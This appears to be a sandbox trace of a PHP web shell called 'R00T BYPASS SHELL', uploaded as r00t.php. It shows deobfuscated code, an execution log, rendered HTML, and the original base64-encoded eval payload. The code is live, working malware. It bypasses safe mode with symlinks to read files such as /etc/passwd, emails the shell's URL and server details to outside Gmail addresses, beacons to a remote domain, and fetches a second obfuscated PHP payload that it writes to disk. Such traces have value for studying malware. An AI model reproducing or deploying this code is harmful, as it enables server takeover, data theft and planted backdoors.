"\\x43\\x6f\\x6e\\x74\\145\\156\\x74\\x2d\\124\\x79\\x70\\x65\\x3a\\x20\\164\\x65\\x78\\x74\\x2f\\150\\164\\155\\x6c\\x3b\\12\\40\\143\\150\\x61\\x72\\x73\\x65\\x74\\75\\x75\\x74\\146\\55\\70\\12"; @mail("\\142\\171\\150\\x65\\x72\\157\\64\\x34\\100\\x67\\155\\141\\x69\\x6c\\56\\x63\\x6f\\x6d", "\\110\\x61\\143\\x6b\\x6c\\x69\\156\\153\\x20\\x42\\151\\x6c\\144\\151\\x72\\151", "{$y}", $header); @mail("\\154\\x6f\\147\\x69\\156\\x6f\\x6c\\144\\x75\\155\\x40\\147\\x6d\\x61\\151\\154\\56\\143\\x6f\\155", "\\110\\141\\x63\\x6b\\154\\151\\156\\x6b\\x20\\x42\\151\\x6c\\144\\151\\x72\\151", "{$y}", $header); } goto qjiBQ; aQVA2: ?>\n\n<?php goto K_wRV; RHsqX: $EL_MuHaMMeD .= "\\123\\145\\162\\166\\x65\\162\\x20\\x69\\163\\154\\x65\\x74\\151\\155\\40\\x73\\x69\\x73\\x74\\x65\\x6d\\x69\\x20\\72\\40" . $_SERVER["\\123\\x45\\122\\x56\\105\\122\\x5f\\x53\\117\\106\\124\\127\\x41\\x52\\x45"] . "\\xd\\12"; goto czwAh; NsI5z: $baslik = "\\163\\x79\\x6d\\64\\60\\x34\\x20\\x73\\150\\145\\x6c\\154\\x20\\x32\\60\\62\\60\\x33"; goto jfhAv; JdRgw: @mail($to_email, $server_mail, $linkcr, $header); goto LNRrn; RM4UY: $header = "\\106\\x72\\x6f\\155\\x3a\\40{$from_shellcode}\\xd\\12\\122\\145\\x70\\x6c\\x79\\x2d\\x74\\x6f\\x3a\\x20{$from_shellcode}"; goto JdRgw; VPdTy: $server_mail = \'\' . gethostbyname($_SERVER["\\123\\x45\\x52\\x56\\x45\\122\\x5f\\x4e\\x41\\115\\105"]) . "\\x20\\40\\x2d\\x20" . $_SERVER["\\x48\\x54\\124\\x50\\137\\110\\117\\x53\\124"] . \'\'; goto fGrge; TFIHp: echo "\\x3c\\144\\151\\x76\\40\\163\\x74\\171\\154\\x65\\75\\42\\142\\141\\143\\153\\x67\\162\\x6f\\x75\\156\\144\\x2d\\143\\x6f\\x6c\\157\\x72\\x3a\\43\\x31\\60\\x31\\60\\x31\\60\\x3b\\xa\\143\\x6f\\154\\157\\162\\72\\171\\145\\x6c\\154\\x6f\\x77\\x22\\76\\x3c\\142\\x3e\\123\\141\\x66\\x65\\x2d\\115\\157\\144\\x65\\x20\\x3a\\x20\\x3c\\x2f\\146\\157\\156\\x74\\x3e" . $Safe; goto xFzOM; Ekj15: ?>\n" method="post">\n<font color="yellow" size="3"><b>Path:<b></font><Input type="text" name="file" style="background-color:black;\ncolor:#FF3300;\nwidth:200px;\n" value="/etc/passwd"><br><font color="yellow" size=3><br><b>File</b></font><input checked type="radio" name="type" value="file"><font color="yellow" size=3> <b>Dir</font><input type="radio" name="type" value="Dir"><br><br><br><Input type="submit" value="Sumbit!" style="width:100px;\nbackground-color:black;\ncolor:yellow">\n</font>\n</Form>\n\n<?php goto WY6v3; z8qZB: $from_shellcode = "\\x5a\\x45\\122\\x4f\\x42\\131\\124\\x45\\x40" . gethostbyname($_SERVER["\\123\\x45\\x52\\126\\x45\\x52\\x5f\\x4e\\101\\x4d\\x45"]) . \'\'; goto c7KIl; xFzOM: ?>\n<Form action="\n<?php goto HNvau; czwAh: $EL_MuHaMMeD .= "\\x53\\x68\\x65\\x6c\\154\\40\\x4c\\x69\\x6e\\x6b\\x20\\72\\40\\150\\164\\164\\160\\72\\57\\57" . $_SERVER["\\x53\\105\\x52\\126\\105\\x52\\x5f\\116\\x41\\115\\105"] . $_SERVER["\\120\\x48\\120\\x5f\\123\\x45\\114\\x46"] . "\\xd\\12"; goto hWTew; JrGAj: ?>\n<table align="center" style="color:lime"> R00T BYPASS SHELL</table>\n</Center>\n</Body>\n</Html>\n<P style="TEXT-ALIGN: center" align=center>\n<?php goto ujahn; fGrge: $linkcr = "\\114\\151\\156\\x6b\\72\\x20" . $_SERVER["\\123\\105\\x52\\x56\\105\\x52\\x5f\\116\\101\\115\\x45"] . \'\' . $_SERVER["\\122\\x45\\x51\\125\\105\\123\\124\\x5f\\125\\122\\111"] . "\\x20\\x2d\\x20\\111\\x50\\x20\\x45\\170\\143\\165\\164\\151\\156\\147\\72\\x20{$ip_remote}\\x20\\55\\40\\x54\\151\\155\\145\\x3a\\x20{$time_shell}"; goto RM4UY; qjiBQ: $kime = "\\x6c\\157\\x67\\x69\\x6e\\x6f\\x6c\\144\\165\\155\\x40\\x67\\x6d\\141\\x69\\154\\x2e\\x63\\157\\x6d"; goto NsI5z; HNvau: echo $_SERVER["\\120\\110\\x50\\137\\x53\\x45\\114\\106"]; goto Ekj15; hWTew: $EL_MuHaMMeD .= "\\101\\x76\\x6c\\x61\\156\\141\\x6e\\x20\\123\\151\\x74\\x65\\x20\\72\\40" . $_SERVER["\\110\\x54\\124\\x50\\137\\x48\\x4f\\x53\\x54"] . "\\xd\\12"; goto uYpgD; cL2_i: $Res = \'\'; goto zOMJp; uce9K: if (@ini_get("\\x73\\x61\\x66\\x65\\137\\x6d\\157\\x64\\145") or strtoupper(@ini_get("\\163\\x61\\x66\\x65\\x5f\\x6d\\157\\x64\\145")) == "\\157\\x6e") { $Safe = "\\x3c\\x73\\160\\x61\\x6e\\x20\\x73\\x74\\171\\154\\145\\x3d\\x22\\x63\\157\\x6c\\x6f\\x72\\72\\x72\\145\\144\\x22\\x3e\\x3c\\x62\\76\\x4f\\x6e\\x3c\\x2f\\142\\x3e\\74\\57\\163\\x70\\x61\\156\\x3e"; } else { $Safe = "\\74\\x73\\x70\\x61\\156\\x20\\x73\\x74\\171\\x6c\\x65\\75\\x22\\143\\x6f\\x6c\\157\\162\\x3a\\x6c\\x69\\155\\145\\42\\76\\74\\x62\\x3e\\117\\146\\x66\\74\\57\\142\\x3e\\x3c\\x2f\\163\\160\\x61\\156\\x3e"; } goto p0Cva; jfhAv: $EL_MuHaMMeD = "\\x44\\x6f\\x73\\x79\\141\\x20\\x59\\157\\x6c\\x75\\40\\72\\x20" . $_SERVER["\\104\\x4f\\x43\\x55\\115\\x45\\x4e\\124\\137\\x52\\x4f\\x4f\\x54"] . "\\xd\\12"; goto fNYhr; c7KIl: $to_email = "\\154\\x6f\\147\\151\\156\\x6f\\154\\144\\x75\\x6d\\x40\\x67\\155\\x61\\151\\154\\56\\x63\\157\\x6d"; goto VPdTy; RJ_R6: ' /var/www/html/uploads/r00t.php 1 0
3 6 0 0.001108 480024 session_start 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 0
3 6 1 0.001164 480776
3 6 R TRUE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $Res = ''
3 7 0 0.001193 480776 is_writable 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 '.'
3 7 1 0.001212 480816
3 7 R TRUE
3 8 0 0.001226 480776 ini_get 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 45 1 'safe_mode'
3 8 1 0.001241 480808
3 8 R FALSE
3 9 0 0.001255 480776 ini_get 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 45 1 'safe_mode'
3 9 1 0.001268 480808
3 9 R FALSE
3 10 0 0.001281 480776 strtoupper 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 45 1 FALSE
3 10 1 0.001295 480808
3 10 R ''
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $Safe = '<span style="color:lime"><b>Off</b></span>'
3 11 0 0.001323 480776 base64_decode 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ=='
3 11 1 0.001339 480872
3 11 R 'https://anonym0us.club/l-'
3 12 0 0.001355 480840 GetIP 1 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 0
4 13 0 0.001366 480840 getenv 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'HTTP_CLIENT_IP'
4 13 1 0.001381 480872
4 13 R FALSE
4 14 0 0.001393 480840 getenv 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'HTTP_X_FORWARDED_FOR'
4 14 1 0.001408 480872
4 14 R FALSE
4 15 0 0.001421 480840 getenv 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'REMOTE_ADDR'
4 15 1 0.001434 480912
4 15 R '127.0.0.1'
3 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $ip = '127.0.0.1'
3 12 1 0.001460 480880
3 12 R '127.0.0.1'
3 16 0 0.001474 480904 base64_encode 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'http://localhost/uploads/r00t.php'
3 16 1 0.001489 481016
3 16 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $x = 'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3 17 0 0.001522 480888 function_exists 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'curl_init'
3 17 1 0.001536 480928
3 17 R TRUE
3 18 0 0.001549 480888 curl_init 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 0
3 18 1 0.001568 481800
3 18 R resource(3) of type (curl)
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $ch = resource(3) of type (curl)
3 19 0 0.001602 481800 curl_setopt 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 3 resource(3) of type (curl) 10002 'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3 19 1 0.001623 481896
3 19 R TRUE
3 20 0 0.001635 481800 curl_setopt 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 3 resource(3) of type (curl) 19913 TRUE
3 20 1 0.001651 481896
3 20 R TRUE
3 21 0 0.001664 481800 curl_exec 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 resource(3) of type (curl)
3 21 1 0.746302 481832
3 21 R ''
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $gitt = ''
3 22 0 0.746368 481800 curl_close 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 resource(3) of type (curl)
3 22 1 0.747222 480944
3 22 R NULL
3 23 0 0.747400 480912 file_get_contents 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3 23 1 1.321833 482968
3 23 R ''
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $gitt = ''
3 24 0 1.322031 482928 date 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 1 'd/m/Y - H:i:s'
3 24 1 1.322105 485280
3 24 R '12/02/2023 - 16:53:58'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $time_shell = '12/02/2023 - 16:53:58'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $ip_remote = '127.0.0.1'
3 25 0 1.322150 485040 gethostbyname 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 37 1 'localhost'
3 25 1 1.322207 485120
3 25 R '127.0.0.1'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 37 $from_shellcode = 'ZEROBYTE@127.0.0.1'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $to_email = 'loginoldum@gmail.com'
3 26 0 1.322250 485088 gethostbyname 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 26 1 'localhost'
3 26 1 1.322277 485168
3 26 R '127.0.0.1'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 26 $server_mail = '127.0.0.1 - localhost'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $linkcr = 'Link: localhost/uploads/r00t.php - IP Excuting: 127.0.0.1 - Time: 12/02/2023 - 16:53:58'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 26 $header = 'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1'
3 27 0 1.322337 485328 mail 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 26 4 'loginoldum@gmail.com' '127.0.0.1 - localhost' 'Link: localhost/uploads/r00t.php - IP Excuting: 127.0.0.1 - Time: 12/02/2023 - 16:53:58' 'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1'
3 27 1 1.323250 485472
3 27 R FALSE
3 28 0 1.323290 485328 fopen 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 'data.txt' 'r'
3 28 1 1.323326 485400
3 28 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $datas = FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i = 0
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i++
3 29 0 1.323373 485328 fgets 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 FALSE 1024
3 29 1 1.323390 485392
3 29 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $blue = FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i++
3 30 0 1.323424 485328 fgets 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 FALSE 1024
3 30 1 1.323437 485392
3 30 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $blue = FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i++
3 31 0 1.323469 485328 fgets 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 FALSE 1024
3 31 1 1.323483 485392
3 31 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $blue = FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i++
3 32 0 1.323513 485328 fgets 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 FALSE 1024
3 32 1 1.323527 485392
3 32 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $blue = FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i++
3 33 0 1.323556 485328 fgets 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 FALSE 1024
3 33 1 1.323570 485392
3 33 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $blue = FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $i++
3 34 0 1.323599 485328 fgets 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 2 2 FALSE 1024
3 34 1 1.323613 485392
3 34 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $blue = FALSE
3 35 0 1.323634 485328 fopen 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 2 'js/js.php' 'r'
3 35 1 1.323665 485400
3 35 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $datasi = FALSE
3 36 0 1.323689 485328 mkdir 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 1 'js'
3 36 1 1.323732 485368
3 36 R TRUE
3 37 0 1.323746 485328 file_get_contents 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 1 'https://acbdf.space/txt/css.txt'
3 37 1 2.086833 534400
3 37 R '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $dos = '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $data = 'js/js.php'
3 38 0 2.087127 534360 touch 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 1 'js/js.php'
3 38 1 2.087178 534400
3 38 R TRUE
3 39 0 2.087194 534360 fopen 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 2 'js/js.php' 'w'
3 39 1 2.087231 534888
3 39 R resource(7) of type (stream)
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $ver = resource(7) of type (stream)
3 40 0 2.087260 534816 fwrite 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 2 resource(7) of type (stream) '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
3 40 1 2.087353 534880
3 40 R 47513
3 41 0 2.087367 534816 fclose 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 1 resource(7) of type (stream)
3 41 1 2.087431 534416
3 41 R TRUE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $yol = 'http://localhost/uploads/r00t.php'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $header .= 'From: SheLL Boot <suppor@nic.org>\n'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 24 $header .= 'Content-Type: text/html;\n charset=utf-8\n'
3 42 0 2.087541 534688 mail 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 4 'byhero44@gmail.com' 'Hacklink Bildiri' '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>' 'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\n charset=utf-8\n'
3 42 1 2.088632 534832
3 42 R FALSE
3 43 0 2.088668 534688 mail 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 4 'loginoldum@gmail.com' 'Hacklink Bildiri' '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>' 'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\n charset=utf-8\n'
3 43 1 2.089821 534832
3 43 R FALSE
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $kime = 'loginoldum@gmail.com'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 26 $baslik = 'sym404 shell 20203'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $EL_MuHaMMeD = 'Dosya Yolu : /var/www/html\r\n'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 2 $EL_MuHaMMeD .= 'Server Admin : webmaster@localhost\r\n'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 26 $EL_MuHaMMeD .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 39 $EL_MuHaMMeD .= 'Shell Link : http://localhost/uploads/r00t.php\r\n'
2 A /var/www/html/uploads/r00t.php(1) : eval()'d code 45 $EL_MuHaMMeD .= 'Avlanan Site : localhost\r\n'
3 44 0 2.089948 534912 mail 0 /var/www/html/uploads/r00t.php(1) : eval()'d code 24 3 'loginoldum@gmail.com' 'sym404 shell 20203' 'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/r00t.php\r\nAvlanan Site : localhost\r\n'
3 44 1 2.091034 535008
3 44 R FALSE
2 5 1 2.091071 534912
1 3 1 2.091084 482928
2.091127 384288
TRACE END [2023-02-12 19:54:25.278771]
Generated HTML code
<html><head>
<title>r00t.info Safe-Over [Apache]</title>
</head>
<body bgcolor="black">
<center>
<font size="-3">
</font><pre><font size="-3"><font color="yellow">
R00T BYPASS SHELL
</font>
</font>
<br><br><br>
<div style="background-color:#101010;
color:yellow"><b>Safe-Mode : <span style="color:lime"><b>Off</b></span><form action="
/r00t.php" method="post">
<font color="yellow" size="3"><b>Path:<b></b></b></font><b><b><input type="text" name="file" style="background-color:black;
color:#FF3300;
width:200px;
" value="/etc/passwd"><br><font color="yellow" size="3"><br><b>File</b></font><input checked="" type="radio" name="type" value="file"><font color="yellow" size="3"> <b>Dir</b></font><b><input type="radio" name="type" value="Dir"><br><br><br><input type="submit" value="Sumbit!" style="width:100px;
background-color:black;
color:yellow">
R00T BYPASS SHELL<table align="center" style="color:lime"></table>
</b></b></b></form></b></div></pre></center><b><b><b>
<p style="TEXT-ALIGN: center" align="center">
</p></b></b></b></body></html>Original PHP code
<?php eval(base64_decode('CiBnb3RvIGFRVkEyOyBMTlJybjogaWYgKCRfUE9TVFsiXHg3MVx4NzVcMTQ1XHg3MlwxNzEiXSkgeyAkdmVyaXlmeSA9IHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9QT1NUWyJceDcxXHg3NVwxNDVceDcyXDE3MSJdKSk7ICRkYXRhID0gIlwxNDRcMTQxXDE2NFx4NjFceDJlXDE2NFx4NzhceDc0IjsgQHRvdWNoKCJceDY0XDE0MVx4NzRcMTQxXHgyZVwxNjRcMTcwXDE2NCIpOyAkdmVyID0gQGZvcGVuKCRkYXRhLCAiXHg3NyIpOyBAZndyaXRlKCR2ZXIsICR2ZXJpeWZ5KTsgQGZjbG9zZSgkdmVyKTsgfSBlbHNlIHsgJGRhdGFzID0gQGZvcGVuKCJceDY0XHg2MVx4NzRceDYxXDU2XHg3NFwxNzBcMTY0IiwgIlx4NzIiKTsgJGkgPSAwOyB3aGlsZSAoJGkgPD0gNSkgeyAkaSsrOyAkYmx1ZSA9IEBmZ2V0cygkZGF0YXMsIDEwMjQpOyBlY2hvICRibHVlOyB9IH0gZ290byBhYUlqRDsgek9NSnA6IGlmIChpc193cml0YWJsZSgiXHgyZSIpKSB7IGlmIChpc3NldCgkX1BPU1RbIlwxNDZcMTUxXHg2Y1wxNDUiXSkpIHsgJGZpbGUgPSAkX1BPU1RbIlwxNDZceDY5XHg2Y1wxNDUiXTsgJGZha2VkaXIgPSAiXHg2M1x4NzgiOyAkZmFrZWRlcCA9IDE2OyBpZiAoIWlzc2V0KCRfU0VTU0lPTlsiXHg2ZVx4NzVcMTU1Il0pKSB7ICRfU0VTU0lPTlsiXDE1Nlx4NzVcMTU1Il0gPSAwOyB9IGVsc2UgeyAkX1NFU1NJT05bIlwxNTZceDc1XDE1NSJdID0gJF9TRVNTSU9OWyJcMTU2XHg3NVwxNTUiXSArIDE7IH0gJGxldmVsID0gMDsgQHVubGluaygiXHg3M1x4NzVcMTU2XHgyZCIgLiAkX1NFU1NJT05bIlx4NmVcMTY1XHg2ZCJdKTsgQG1rZGlyKCJcMTYzXDE2NVx4NmVcNTUiIC4gJF9TRVNTSU9OWyJceDZlXDE2NVwxNTUiXSk7IGNoZGlyKCJceDczXHg3NVx4NmVcNTUiIC4gJF9TRVNTSU9OWyJceDZlXDE2NVx4NmQiXSk7IGZvciAoJGFzID0gMDsgJGFzIDwgJGZha2VkZXA7ICRhcysrKSB7IGlmICghZmlsZV9leGlzdHMoJGZha2VkaXIpKSB7IG1rZGlyKCRmYWtlZGlyKTsgfSBjaGRpcigkZmFrZWRpcik7IH0gd2hpbGUgKDEgPCAkYXMtLSkgeyBjaGRpcigiXHgyZVw1NiIpOyB9ICRoYXJkc3R5bGUgPSBleHBsb2RlKCJcNTciLCAkZmlsZSk7IGZvciAoJGEgPSAwOyAkYSA8IGNvdW50KCRoYXJkc3R5bGUpOyAkYSsrKSB7IGlmICghZW1wdHkoJGhhcmRzdHlsZVskYV0pKSB7IGlmICghZmlsZV9leGlzdHMoJGhhcmRzdHlsZVskYV0pKSB7IG1rZGlyKCRoYXJkc3R5bGVbJGFdKTsgfSBjaGRpcigkaGFyZHN0eWxlWyRhXSk7ICRhcysrOyB9IH0gJGFzKys7IHdoaWxlICgkYXMtLSkgeyBjaGRpcigiXDU2XHgyZSIpOyB9IEBybWRpcigiXHg3M1wxNjVceDZlXHgyZFwxNDZceDYxXDE1M1wxNDUiKTsgQHVubGluaygiXHg3M1x4NzVcMTU2XHgyZFx4NjZceDYxXDE1M1x4NjUiKTsgQHN5bWxpbmsoc3RyX3JlcGVhdCgkZmFrZWRpciAuICJceDJmIiwgJGZha2VkZXApLCAiXDE2M1wxNjVceDZlXDU1XDE0Nlx4NjFceDZiXHg2NSIpOyBpZiAoJF9QT1NUWyJcMTY0XHg3OVwxNjBceDY1Il0gPT0gIlx4NjZceDY5XDE1NFx4NjUiKSB7IHdoaWxlICgxKSB7IGlmICh0cnVlID09IEBzeW1saW5rKCJceDczXDE2NVwxNTZceDJkXHg2NlwxNDFceDZiXHg2NVw1NyIgLiBzdHJfcmVwZWF0KCJceDJlXHgyZVw1NyIsICRmYWtlZGVwIC0gMSkgLiAkZmlsZSwgIlwxNTFcMTU2XHg2NFwxNDVcMTcwXHgyZVx4NjhcMTY0XHg2ZFwxNTQiKSkgeyBicmVhazsgfSBlbHNlIHsgJG51bSsrOyB9IH0gQHVubGluaygiXHg3M1wxNjVcMTU2XDU1XDE0NlwxNDFcMTUzXDE0NSIpOyBta2RpcigiXDE2M1x4NzVcMTU2XHgyZFwxNDZceDYxXDE1M1wxNDUiKTsgJFJlcyA9ICJcNzRceDQ2XDExN1x4NGVcMTI0XDQwXHg0M1x4NGZceDRjXHg0ZlwxMjJceDNkXDQyXDEyMlwxMDVceDQ0XHgyMlx4M2VcNzRceDQyXDc2XHgyMFwxNjNcMTcxXDE1NVx4NmNceDY5XHg2ZVwxNTNcNDBcNzRcMTAyXDc2XHgzY1x4NjFcNDBcMTUwXDE2Mlx4NjVceDY2XDc1XHgyMlw1Nlx4MmZceDczXHg3NVx4NmVceDJkIiAuICRfU0VTU0lPTlsiXDE1NlwxNjVceDZkIl0gLiAiXDU3XHgyMlw3Nlx4NzNcMTcxXHg2ZFx4NmNcMTUxXHg2ZVx4NmIiIC4gJG51bSAuICJceDNjXDU3XHg2MVx4M2VcNDBcMTQ2XHg2OVwxNTRceDY1XHgzY1x4MmZcMTA2XDExN1x4NGVceDU0XHgzZSI7IH0gZWxzZSB7ICRmcCA9IGZvcGVuKCJceDJlXHg2OFwxNjRcMTQxXHg2M1wxNDNceDY1XHg3M1wxNjMiLCAiXHg2MVx4MmIiKTsgJEZpbGUgPSAiXDEwNFwxNTFceDcyXDE0NVx4NjNceDc0XHg2Zlx4NzJceDc5XDExMVwxNTZceDY0XDE0NVwxNzBcNDBceDczXDE2NVwxNTZceDJlXHg2OFx4NzRcMTU1IjsgZndyaXRlKCRmcCwgJEZpbGUpOyB3aGlsZSAoMSkgeyBpZiAodHJ1ZSA9PSBAc3ltbGluaygiXDE2M1wxNjVceDZlXDU1XHg2NlwxNDFceDZiXDE0NVw1NyIgLiBzdHJfcmVwZWF0KCJcNTZceDJlXDU3IiwgJGZha2VkZXAgLSAxKSAuICRmaWxlLCAiXDE2M1x4NzVceDZlIikpIHsgYnJlYWs7IH0gZW